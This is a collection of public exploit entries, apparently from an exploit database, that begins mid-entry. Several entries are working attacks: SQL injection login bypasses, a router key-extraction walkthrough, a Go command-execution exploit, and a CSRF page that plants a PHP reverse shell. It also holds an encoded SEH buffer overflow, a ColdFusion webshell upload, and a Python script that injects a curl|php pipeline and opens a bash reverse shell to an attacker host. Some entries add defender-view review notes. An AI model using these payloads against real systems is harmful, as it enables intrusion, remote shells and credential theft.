  Observed result: C:\Windows\win.ini has had its security descriptor rewritten to grant 'Full Control' to the low-privileged user. (win.ini is only the demonstration target; per the summary above the same hard-link primitive applies to an arbitrary file, which is what makes this an elevation of privilege.) PoC files: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47389.zip References: https://github.com/sgabe/CVE-2019-1253 https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1253 https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841
  16. # Exploit Title: College-Management-System 1.2 - Authentication Bypass # Author: Cakes # Discovery Date: 2019-09-14 # Vendor Homepage: https://github.com/ajinkyabodade/College-Management-System # Software Link: https://github.com/ajinkyabodade/College-Management-System/archive/master.zip # Tested Version: 1.2 # Tested on OS: CentOS 7 # CVE: N/A # Description: # Authentication bypass via SQL injection in the emailid parameter of principalcheck.php, # allowing the attacker to log in as the school principal without knowing any password. # The payload ' or 0=0 # makes the WHERE clause always true and comments out the rest of the # query (including the password check), which indicates the login query is built by string # concatenation; the fix is a parameterized query. # Simply replay the below Burp request or use Curl. # Payload: ' or 0=0 # POST /college/principalcheck.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://TARGET/college/principalcheck.php Content-Type: application/x-www-form-urlencoded Content-Length: 36 Cookie: PHPSESSID=9bcu5lvfilimmvfnkinqlc61l9; Logmon=ca43r5mknahus9nu20jl9qca0q Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 emailid='%20or%200%3d0%20#&pass=asdf
  17. # Exploit Title: Ticket-Booking 1.4 - Authentication Bypass # Author: Cakes # Discovery Date: 2019-09-14 # Vendor Homepage: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking # Software Link: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking/archive/master.zip # Tested Version: 1.4 # Tested on OS: CentOS 7 # CVE: N/A # Description: # Authentication bypass via SQL injection in the userid parameter of the sign-in handler, # allowing the attacker to remove any previously booked seats. # The payload ' or 0=0 # makes the WHERE clause always true and comments out the password # check, which indicates the login query is built by string concatenation; the fix is a # parameterized query. # Simply replay the below Burp request or use Curl (remember to change the Cookie values) POST /ticket/cancel.php HTTP/1.1 Host: Target User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://Target/ticket/login.php Content-Type: application/x-www-form-urlencoded Content-Length: 50 Cookie: PHPSESSID=j9jrgserbga22a9q9u165uirh4; rental_property_manager=mq5iitk8ic80ffa8dcf28294d4 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 userid='%20or%200%3d0%20#&password=123&save=signin
  18. # Exploit Title: Inteno IOPSYS Gateway 3DES Key Extraction - Improper Access Restrictions # Date: 2019-06-29 # Exploit Author: Gerard Fuguet (gerard@fuguet.cat) # Vendor Homepage: https://www.intenogroup.com/ # Version: EG200-WU7P1U_ADAMO3.16.4-190226_1650 # Fixed Version: EG200-WU7P1U_ADAMO3.16.8-190820_0937 # Affected Component: SIP password, Info Gathering of Network Config # Attack Type: Remote # Tested on: Kali Linux 2019.2 against an Inteno EG200 Router # CVE : CVE-2019-13140 # Description: Inteno EG200 EG200-WU7P1U_ADAMO3.16.4-190226_1650 and before firmwares routers have a JUCI ACL misconfiguration that allows the "user" account to extract the 3DES key via JSON commands to ubus. The 3DES key is used to decrypt the provisioning file provided by Adamo Telecom on a public URL via cleartext HTTP. # Attack Vectors: To get success on the exploitation, two components are mandatory: 1. the encrypted file (.enc) and 2. The 3DES key for decrypt it. The encrypted file can be downloaded via HTTP URL offered by Adamo ISP (works from any external network). Then is need to interact with the router using WebSocket protocol to obtain the 3DES key, a web browser like Firefox can be used as WebSocket client under the developer tools. Session id is acquired with the same username and password of the router (in this case, password is the same as wifi defaults). Once 3DES key is obtained through a JSON request command, .enc file can be decrypted with the help of openssl tool. # PoC: Step 1: Getting the provisioning file Download from http://inteno-provisioning.adamo.es/XXXXXXXXXXXX.enc Where XXXXXXXXXXXX is your router’s Inteno MAC, all in capitals and without the colons. You can also get your MAC by doing a ping to the router and then an arp command on terminal. Step 2: The 3DES Key Let's communcatie by Sockets - Using Firefox, open the router’s webpage (192.168.1.1 by default). - Invoke the developer tools by pressing F12 and go to the Console Tab. 
- Let’s create the WebSocket: var superSocket = new WebSocket("ws://192.168.1.1/", "ubus-json") - And creating the Log for show responses in each petition: superSocket.onmessage = function (event) {console.log(event.data)} - We request an ID session with the same login parameters that when access to the router’s website. (put your wifis router password instead of wifis-password value): superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["00000000000000000000000000000000","session","login",{"username":"user","password":"wifis-password"}],"id":666})) - Now, you will obtain a response, the value of the parameter that says “ubus_rpc_session” refers to your session’s ID, copy it to use in the next request call. - Requesting information about the router’s System. (put your session ID instead of put-your-session-id-here value): superSocket.send(JSON.stringify({"jsonrpc":"2.0","method":"call","params":["put-your-session-id-here","router.system","info",{}],"id":999})) - On the response obtained, copy the value of the “des” parameter. It’s 16 digits that we need convert to hexadecimal. Step 3: Ready for Decrypting Convert to HEX using xxd tool where XXXXXXXXXXXXXXXX is your "des" key: echo -n XXXXXXXXXXXXXXXX | xxd -p - Use openssl tool to decrypt your provisioning file. (Put your "des" key instead of your-des-key-in-hex-format value and the XXXXXXXXXXXX refers the name of your encryption provisioning file, in the -out value, the name can be different): openssl enc -d -des-ede -nosalt -K your-des-key-in-hex-format -in XXXXXXXXXXXX.enc -out XXXXXXXXXXXX.tar.gz - Uncompress the decrypted file: tar -xzvf XXXXXXXXXXXX.tar.gz - You get the file: Provisioning.conf. - Showing the file: cat Provisioning.conf - The end of the line refers to the secret, the password of your SIP account. 
  A video was created to show all these steps in action: https://youtu.be/uObz1uE5P4s # Additional Information: A packet sniffer like Wireshark can be used to retrieve the 3DES key instead of driving the WebSocket protocol by hand. In that case the user only needs to log in on the router's web page; the JSON response containing the 3DES key can then be captured. This works because the router's WebSocket endpoint is plain ws:// (no TLS), so both the login and the key cross the LAN in cleartext and are visible to anyone positioned between the browser and the router. # References: https://twitter.com/GerardFuguet/status/1169298861782896642 https://www.slideshare.net/fuguet/call-your-key-to-phone-all # Timeline: 2019-06-29 - White Paper done 2019-07-01 - CVE assigned 2019-07-09 - Notified to Inteno 2019-07-11 - Adamo aware and ask for detailed info 2019-07-12 - Info facilitated 2019-07-25 - Early patch available and applied (Cooperation starts) 2019-07-26 - Tested and failed (VoIP not working) 2019-08-27 - New firmware available 2019-08-30 - Firmware EG200-WU7P1U_ADAMO3.16.8-190820_0937 applied on router 2019-08-31 - Tested OK 2019-09-04 - Disclosure published
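/********************************************************************************
# Exploit Title: NetGain EM Plus <= v10.1.68 - Unauthorized Local File Inclusion
# Date: 15 September 2019
# Exploit Author: azams / @TheRealAzams
# Vendor Homepage: http://netgain-systems.com
# Software Link: http://www.netgain-systems.com/free/
# Version: v10.1.68
# Tested on: Linux
#
# Install golang: https://golang.org/doc/install
# Compile exploit: go build exploit.go
# Run exploit without compiling: go run exploit.go
# Shouts: Rix, Channisa, Ridho7ul & Horangi!
#
# NOTE(review): despite the title, what this code does is POST a shell script to
# /u/jsp/designer/script_test.jsp without any credentials and read back its
# output, i.e. unauthenticated command execution rather than file inclusion.
# Only run it against systems you are authorised to test.
*********************************************************************************/
package main

import (
	"crypto/tls"
	"fmt"
	"io/ioutil"
	"net/http"
	"net/url"
	"os"
	"strings"
)

// marker brackets the command output so it can be cut out of the JSP response.
const marker = "0xdeadnoob"

var (
	target string // scheme + host, e.g. http://127.0.0.1 (-u)
	port   string // TCP port, kept as a string because it is only concatenated (-p)
	cmd    string // shell command to run on the target (-cmd)
)

// parseArgs fills target/port/cmd from args (os.Args without the program name).
// It returns false when a flag is given without a value, so main can print the
// usage line instead of indexing past the end of the slice.
func parseArgs(args []string) bool {
	for i := 0; i < len(args); i++ {
		switch args[i] {
		case "-u", "-p", "-cmd":
			if i+1 >= len(args) {
				return false
			}
			value := args[i+1]
			switch args[i] {
			case "-u":
				target = value
			case "-p":
				port = value
			case "-cmd":
				cmd = value
			}
			i++ // skip the consumed value
		}
	}
	return true
}

func main() {
	// All three flags are required. The original test was `||`, which let a
	// single flag through and then built a request against an empty host.
	if !parseArgs(os.Args[1:]) || target == "" || port == "" || cmd == "" {
		fmt.Println("Usage: ./exploit -u http://127.0.0.1 -p 8181 -cmd 'id;'")
		os.Exit(1)
	}

	status, body := exploit()
	if !strings.Contains(status, "200") {
		fmt.Println("Exploit failed!")
		os.Exit(1)
	}
	fmt.Println("Status Code: " + status)

	// A 200 without both markers means the page answered but the script did not
	// run; the original indexed parts[1] unconditionally and would panic here.
	parts := strings.Split(body, marker)
	if len(parts) < 3 {
		fmt.Println("Exploit failed!")
		os.Exit(1)
	}
	fmt.Println("Result: \n" + strings.Trim(parts[1], "\n"))
}

// exploit POSTs the shell script to script_test.jsp and returns the HTTP
// status line and the response body. On a request-building or transport
// error it reports to stderr and returns two empty strings, which main
// treats as failure.
func exploit() (string, string) {
	// The script is passed as the decoded form value and encoded exactly once by
	// url.Values.Encode, so a command containing '&', '+' or '%' is no longer
	// mangled (the original URL-encoded the template and then ran the user's
	// command through url.ParseQuery as part of it). The first line decodes to
	// "#2Fbin/sh" in the original as well, presumably a garbled shebang that
	// the server ignores; it is kept unchanged.
	script := "#2Fbin/sh\necho '" + marker + "'\n" + cmd + "\necho '" + marker + "'"
	form := url.Values{}
	form.Set("type", "sh")
	form.Set("content", script)
	form.Set("args", "")
	form.Set("count", "0")
	form.Set("ip", "localhost")

	// InsecureSkipVerify: targets are commonly reached over a self-signed
	// certificate. This disables TLS verification for the whole client.
	transport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}
	client := &http.Client{Transport: transport}

	endpoint := target + ":" + port + "/u/jsp/designer/script_test.jsp"
	req, err := http.NewRequest("POST", endpoint, strings.NewReader(form.Encode()))
	if err != nil {
		fmt.Fprintln(os.Stderr, "bad target URL:", err)
		return "", ""
	}
	req.Header.Set("Content-type", "application/x-www-form-urlencoded")

	resp, err := client.Do(req)
	if err != nil {
		fmt.Fprintln(os.Stderr, "request failed:", err)
		return "", ""
	}
	defer resp.Body.Close()

	body, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		fmt.Fprintln(os.Stderr, "reading response failed:", err)
		return "", ""
	}
	return resp.Status, string(body)
}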
  <!-- 20. -->
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16068 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
#--------------------------------------------------------------------#
 _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma CSRF by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus
The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.
<!--
Reviewer notes (defender view).

What the page does: when opened in a browser that holds an Enigma NMS session,
it submits a cross-site multipart POST to /cgi-bin/protected/manage_files.cgi
with action=system_upgrade and action_aux=upload_file_complete, attaching the
victim's cookies (xhr.withCredentials = true) and an "upfile" part named
evil.php. Nothing in the request is a per-request secret: there is no anti-CSRF
token, only the session cookie, which is what makes the forgery work.

Detection: uploads to manage_files.cgi whose Origin/Referer is not the
appliance itself, and any new .php file appearing in the upload location.

Mitigation: a per-session anti-CSRF token validated by manage_files.cgi,
SameSite session cookies, and an allowlist of upload file types. The header
lists 65.0.0 as affected (CVE-2019-16068); a fixed release is not stated here.
-->
<html>
<script>history.pushState('', '', '/')</script>
<script>
// Hand-builds the multipart body so the boundary matches the Content-Type
// header, then sends it as a Blob of raw bytes.
function submitRequest() {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "http:\/\/<enigma_nms_ipaddr>\/cgi-bin\/protected\/manage_files.cgi", true);
  xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
  xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------208051173310446317141640314495");
  // Sends the victim's cookies with the cross-site request.
  xhr.withCredentials = true;
  // Three form parts: action, action_aux, the file part "upfile", and the
  // file name "upfile_name".
  var body = "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action\"\r\n" + "\r\n" + "system_upgrade\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"action_aux\"\r\n" + "\r\n" + "upload_file_complete\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile\"; filename=\"evil.php\"\r\n" + "Content-Type: application/x-php\r\n" + "\r\n" + "\x3c?php\n" + "\n" + "exec(\"/bin/bash -c \'bash -i \x3e& /dev/tcp/<attacking_host_ipaddr>/1337 0\x3e&1\'\");\n" + "\n" + "?\x3e\n" + "\r\n" + "-----------------------------208051173310446317141640314495\r\n" + "Content-Disposition: form-data; name=\"upfile_name\"\r\n" + "\r\n" + "evil.php\r\n" + "-----------------------------208051173310446317141640314495--\r\n";
  // Copies the string byte-for-byte into a typed array before sending.
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}
submitRequest();
// Navigates the victim to a normal page of the application right after the
// request is issued.
window.location='http://<enigma_nms_ipaddr>/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
</script>
<body onload="submitRequest();" >
</body>
</html>
  # 21.
import struct
# Title: docPrint Pro v8.0 'User/Master Password' Local SEH Alphanumeric Encoded Buffer Overflow
# Date: September 14th, 2019
# Author: Connor McGarr (@33y0re) (https://connormcgarr.github.io)
# Vendor Homepage: http://www.verypdf.com
# Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
# Version: 8.0
# Tested on: Windows 10 and Windows 7
# TO RUN:
# 1. Create a blank file named "test.pdf"
# 2. Open doc2pdf_win.exe
# 3. When the application loads, go to Settings > PDF Security > and check "Encrypt PDF File"
# 4. Run this python script. Copy the contents and paste it into the "User Password" and "Master Password" fields and press "okay"
# 5. Click "Add File(s)"
# 6. Select the "test.pdf" file created from step 1.
# 7. Press on "Start" and name the file "exploit.pdf"
# Unusual bad characters include: \x01\x05\x07\x08\x09 (and the usual suspects that are not ASCII)

# Reviewer notes (defender view).
# - Written for Python 2: `payload` is a str that is concatenated with the bytes
#   returned by struct.pack(); under Python 3 that concatenation raises TypeError.
# - The script itself only writes bajablast.txt. The overflow is triggered by a
#   person pasting that text into the User/Master Password fields (step 4), so
#   this is a local, interactive crash, not a remote one.
# - The SEH handler is overwritten with a fixed address in reg.dll (0x10011874,
#   "pop pop ret" per the comment below); the author notes the module has no
#   ASLR. The durable mitigation is shipping that module with ASLR and SafeSEH
#   and bounding the length accepted by the password fields.
# - Every shellcode byte below is an ASCII value because the input field only
#   survives printable characters (see the bad-character note above); the
#   MessageBox payload is therefore "sub-encoded" and decoded onto the stack.

# Zero out registers for calculations.
# 0x25 = AND EAX, imm32. The two masks share no set bits, so eax ends as 0.
zero = "\x25\x01\x01\x01\x01"
zero += "\x25\x10\x10\x10\x10"

# Stack alignment
# esp is copied into eax, reduced by three immediates (split so that no byte
# falls outside the allowed set) and written back, so the PUSHes below land
# at a relocated stack position.
alignment = "\x54" # push esp
alignment += "\x58" # pop eax
alignment += "\x2d\x1a\x50\x55\x55" # sub eax, 0x1a505555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x2d\x1a\x4e\x55\x55" # sub eax, 0x1a4e5555
alignment += "\x50" # push eax
alignment += "\x5c" # pop esp

# Custom created and encoded MessageBox POC shellcode.
# Utilized application DLL with no ASLR for Windows API call to MessageBox function.
# \x31\xc0\x50\x68
# \x42\x41\x4a\x41
# \x89\xe1\x50\x68
# \x42\x41\x4a\x41
# \x89\xe2\x50\x50
# \x51\x52\x50\xbe
# \x38\x20\x00\x10
# \xff\xe6\x41\x41
#
# Each group below follows the same pattern: zero eax, subtract three
# immediates (0x2d = SUB EAX, imm32) so that eax wraps to one 4-byte word of
# the raw shellcode above, then PUSH it. Pushes go from the last word to the
# first because the stack grows downward.
# 534F1555 534F0255 53500157 (bit of byte mangling after jmp esi, but works nonetheless!)
shellcode = zero # zero out eax
shellcode += "\x2d\x55\x15\x4f\x53" # sub eax, 0x534f1555
shellcode += "\x2d\x55\x02\x4f\x53" # sub eax, 0x534f0255
shellcode += "\x2d\x57\x01\x50\x53" # sub eax, 0x53500157
shellcode += "\x50" # push eax
# 4F554A42 4F554A42 51554B44
shellcode += zero # zero out eax
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x42\x4a\x55\x4f" # sub eax, 0x4f554a42
shellcode += "\x2d\x44\x4b\x55\x51" # sub eax, 0x51554b44
shellcode += "\x50" # push eax
# 153A393A 153A393A 173B3B3B
shellcode += zero # zero out eax
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a (bytes 3a 39 3a 15 little-endian; the original comment said 0x173b3b3b)
shellcode += "\x2d\x3a\x39\x3a\x15" # sub eax, 0x153a393a
shellcode += "\x2d\x3b\x3b\x3b\x17" # sub eax, 0x173b3b3b
shellcode += "\x50" # push eax
# 3A3A1927 3A3A0227 3B3B0229
shellcode += zero # zero out eax
shellcode += "\x2d\x27\x19\x3a\x3a" # sub eax, 0x3a3a1927
shellcode += "\x2d\x27\x02\x3a\x3a" # sub eax, 0x3a3a0227
shellcode += "\x2d\x29\x02\x3b\x3b" # sub eax, 0x3b3b0229
shellcode += "\x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040
shellcode += zero # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50" # push eax
# 323A1A27 323A0227 333B0229
shellcode += zero # zero out eax
shellcode += "\x2d\x27\x1a\x3a\x32" # sub eax, 0x323a1a27
shellcode += "\x2d\x27\x02\x3a\x32" # sub eax, 0x323a0227
shellcode += "\x2d\x29\x02\x3b\x33" # sub eax, 0x333b0229
shellcode += "\x50" # push eax
# 3F3C3F3F 3F3C3F3F 403D4040 (same word as two groups above; pushed a second time)
shellcode += zero # zero out eax
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x3f\x3f\x3c\x3f" # sub eax, 0x3f3c3f3f
shellcode += "\x2d\x40\x40\x3d\x40" # sub eax, 0x403d4040
shellcode += "\x50" # push eax
# 323A1545 323A1545 333B1545
shellcode += zero # zero out eax
shellcode += "\x2d\x45\x15\x3a\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3A\x32" # sub eax, 0x323a1545
shellcode += "\x2d\x45\x15\x3b\x33" # sub eax, 0x333b1545
shellcode += "\x50" # push eax

# Let's roll.
# Layout: 1676 bytes of filler up to the SEH record, then nSEH (a short
# conditional jump pair: 0x70 = JO rel8, 0x71 = JNO rel8, one of which is
# always taken), then the handler address, then the decoder and shellcode.
payload = "\x41" * 1676
payload += "\x70\x06\x71\x06" # JO 6 bytes. If fails, JNO 6 bytes
payload += struct.pack('<L', 0x10011874) # pop ebp pop ebx ret reg.dll
payload += "\x41" * 2 # Padding to reach alignment
payload += alignment
payload += shellcode
# Pads the buffer to exactly 6000 bytes.
payload += "\x45" * (6000-len(payload))

# Write to file
f = open('bajablast.txt', 'w')
f.write(payload)
f.close()
  22. # Exploit Title: Notepad++ all x64 versions before 7.7. Remote memory corruption via .ml file. # Google Dork: N/A # Date: 2019-09-14 # Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com) # Vendor Homepage: https://notepad-plus-plus.org/ # Version: < 7.7 # Tested on: Windows x64 # CVE : CVE-2019-16294 # Description: SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file. Open aaaaa.ml via affected notepad++ POC files: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47393.zip Result: (230.c64): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Notepad++\SciLexer.dll - rax=00007ff8e64014c0 rbx=00000000000aaaaa rcx=00000000000aaaaa rdx=0000000000000003 rsi=0000000000000000 rdi=00000000ffffffff rip=00007ff8e63c071d rsp=000000aa06463d60 rbp=000000aa06463e81 r8=0000000000002fc8 r9=0000000000000000 r10=000000000000fde9 r11=000000aa06463d90 r12=0000000000000000 r13=0000000000000000 r14=0000000000000001 r15=0000000000000002 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 SciLexer!Scintilla_DirectFunction+0x950dd: 00007ff8e63c071d 0fb70458 movzx eax,word ptr [rax+rbx*2] ds:00007ff8e6556a14=???? Note: the faulting instruction is a 16-bit read through [rax+rbx*2] with rbx=0xaaaaa, i.e. an out-of-bounds read; this trace on its own demonstrates the crash (denial of service), while the remote-code-execution part of the description above is not shown by this output.
  23. ===========Security Intelligence============ # Vendor Homepage: adobe.com # Version: 2018 # Tested on: Adobe ColdFusion 2018 # Exploit Author: Pankaj Kumar Thakur (Nepal) ==========[Table of Contents]============== * Overview * Detailed description * Thanks & Acknowledgements * References ==========[Vulnerability Information]======== * Unrestricted file upload in Adobe ColdFusion 2018 * CWE-434 * Base Score: 6.8 MEDIUM * Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H =========[ Overview]========================= * System Affected: Adobe ColdFusion 2018 * Impact: Unrestricted file upload =====[ Detailed description]================= Unrestricted file upload vulnerability in the Symantec Advanced Secure Gateway (ASG) and ProxySG management consoles. A malicious appliance administrator can upload arbitrary malicious files to the management console and trick another administrator user into downloading and executing malicious code. Note: the paragraph above is worded for the Symantec ASG/ProxySG management consoles rather than ColdFusion; the ColdFusion-specific detail is the request that follows, and the vector above (PR:H, UI:R) states that high privileges and user interaction are required. Request POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 Host: hostname:portno User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0 Content-Type: multipart/form-data; Content-Length: 303 Connection: close Upgrade-Insecure-Requests: 1 . . -----------------------------24464570528145 Content-Disposition: form-data; name="file"; filename="shell_file with extension" Content-Type: image/jpeg shell code -----------------------------24464570528145 Content-Disposition: form-data; name="path" . . After uploading the shell, it is located here http://coldfusion:port/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/shell_file with extension =====[ Thanks & Acknowledgements]======================================== * Acknowledged by Adobe * Duplicate * https://nvd.nist.gov/vuln/detail/CVE-2016-10258 * https://www.cvedetails.com/cve/CVE-2016-1713/ * https://www.openwall.com/lists/oss-security/2016/01/12/4 =====[ EOF ]===========================================================
  24. #--------------------------------------------------------------------# # Exploit Title: Enigma NMS search_pattern SQL Injection # # Date: 21 July 2019 # # Author: Mark Cross (@xerubus | mogozobo.com) # # Vendor: NETSAS Pty Ltd # # Vendor Homepage: https://www.netsas.com.au/ # # Software Link: https://www.netsas.com.au/enigma-nms-introduction/ # # Version: Enigma NMS 65.0.0 # # CVE-IDs: CVE-2019-16065 # # Full write-up: https://www.mogozobo.com/?p=3647 # #--------------------------------------------------------------------# _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma SQLi by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus Request: http://<enigma_nms_ipaddr>/cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern= Vulnerable Parameter: search_pattern (GET) Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='
  # 25.
#!/usr/bin/python
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS OS Command Injection #
# NETSAS Pty Ltd Enigma NMS #
# Date: 21 July 2019 #
# Author: Mark Cross (@xerubus | mogozobo.com) #
# Vendor: NETSAS Pty Ltd #
# Vendor Homepage: https://www.netsas.com.au/ #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
# Version: Enigma NMS 65.0.0 #
# CVE-IDs: CVE-2019-16072 #
# Full write-up: https://www.mogozobo.com/?p=3647 #
#--------------------------------------------------------------------#

# Reviewer notes (defender view).
# - Python 2 script (print statements, raw_input, SimpleHTTPServer).
# - Injection point: the ip_address query parameter of
#   /cgi-bin/protected/discover_and_manage.cgi (action=snmp_browser). The value
#   sent is "|curl <attacker>:<port>/evil.php|php", a shell pipeline, so the
#   parameter evidently reaches a shell unquoted. The request carries HTTP basic
#   credentials (auth=(user, password)), so this is post-authentication.
# - Detection: ip_address values that are not an IP literal, in particular ones
#   containing "|", and curl/php child processes spawned from the web server.
# - Mitigation: validate ip_address as an IP literal and never pass it through a
#   shell; the header lists 65.0.0 as affected (CVE-2019-16072) and does not
#   state a fixed release.
# - Side effects of running this script: it clears the terminal, writes evil.php
#   into the current directory, starts a SimpleHTTPServer and a netcat listener,
#   and terminates only the HTTP server at the end (the listener is left running).

import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading

os.system('clear')
print("""\
 _ _ ___ (~ )( ~) / \_\ \/ / | D_ ]\ \/ -= Enigma NMS Reverse Shell by @xerubus =- | D _]/\ \ -= We all have something to hide =- \___/ / /\ \\ (_ )( _) @Xerubus
""")

# Interactive inputs; the password prompt disables terminal echo around raw_input.
enigma_host = raw_input("Enter Enigma NMS IP address:\t")
attack_host = raw_input("Enter Attacker IP address:\t")
rev_sh_port = raw_input("Enter reverse shell port:\t")
web_svr_port = raw_input("Enter web server port:\t\t")
user = raw_input("Enter Username:\t\t\t")
os.system("stty -echo")
password = raw_input("Enter Password (no echo):\t")
os.system("stty echo")

# The ip_address value is the injected pipeline; every other parameter is an
# ordinary SNMP-browser form value.
enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
# Browser-like headers; Referer points at the attacker host rather than the appliance.
enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

print "\n\n[+] Building PHP reverse shell"
# Writes the PHP file that the injected curl|php pipeline fetches and runs.
f=open("evil.php","w")
f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
f.close()

# Create simple webserver hosting evil php file
print "[+] Hosting PHP reverse shell"
web_svr_port = str(web_svr_port)
# Own process group (setsid) so the whole server can be killed with killpg below.
web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)

# Create netcat listener
print "[+] Creating listener on port " + rev_sh_port
subprocess.Popen(["nc", "-nvlp", rev_sh_port])

# Send payload to Enigma NMS
print "[+] Sending payload\n"
# Any exception from the request (including a timeout) is swallowed; the
# script continues to clean-up regardless.
try:
    r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
except:
    pass

print "\n[+] Cleaning up mess..."
# Shut down http server
os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)